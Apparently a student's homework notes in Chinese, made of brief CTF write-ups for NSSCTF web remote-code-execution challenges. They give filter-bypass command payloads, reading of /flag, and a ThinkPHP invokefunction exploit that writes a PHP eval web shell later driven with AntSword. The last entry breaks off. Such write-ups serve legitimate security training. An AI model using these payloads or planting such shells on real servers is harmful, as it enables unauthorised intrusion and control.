25计科秦欢
假期作业
[SWPUCTF 2021 新赛]easyrce |
/?url=system(“ls /”); 列出根目录
/?url=system(“cat /flag”);
[SWPUCTF 2021 新生赛]babyrce |
打开环境,有代码得,要在控制台中cookie添加一个应用程序
访问得到一个文件,/rasalghul.php接着访问,由代码得出要过滤空格,
?url=ls #列出根目录,
使用$IFS %09 过滤空格
[SWPUCTF 2021 新生赛]finalrce |
打开环境发现过滤了很多字符,构建一个文件6.txt
/?url=l\s /|tee 6.txt
然后直接访问文件
要打开flag文件,使用/?url=tac /flllll\aaaaaaggggggg|tee 7.txt
然后直接访问7.txt文件
[SWPUCTF 2022 新生赛]ez_rce
打开环境,发现什么也没有,使用dirseach扫描,发现文件
接着访问文件,当访问到/robots.txt时,发现下面语句
接着访问/NSS/index.php ,要特别注意这里大小写不能错,否则访问不出来
接着搜索图上内容得到解决方法,
接着输入
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>
在输入上面字符
接下就要用到蚁剑了,连接到蚁剑
拿到flag
[SWPUCTF 2023 秋季新生赛]RCE-PLUS
打开环境,根据题目意思发现参数是cmd,使用http://node4.anna.nssctf.cn:28223/?cmd=ls%20/|tee%20a.txt
创建一个文件a.txt,然后访问
然后使用这个/?cmd=cat /f*|tee a.txt,再次访问得到flag
[NISACTF 2022]middlerce
这题使用的是正则匹配的NIF匹配引擎,这个匹配引擎的原理是基于从后往前回溯的匹配机制
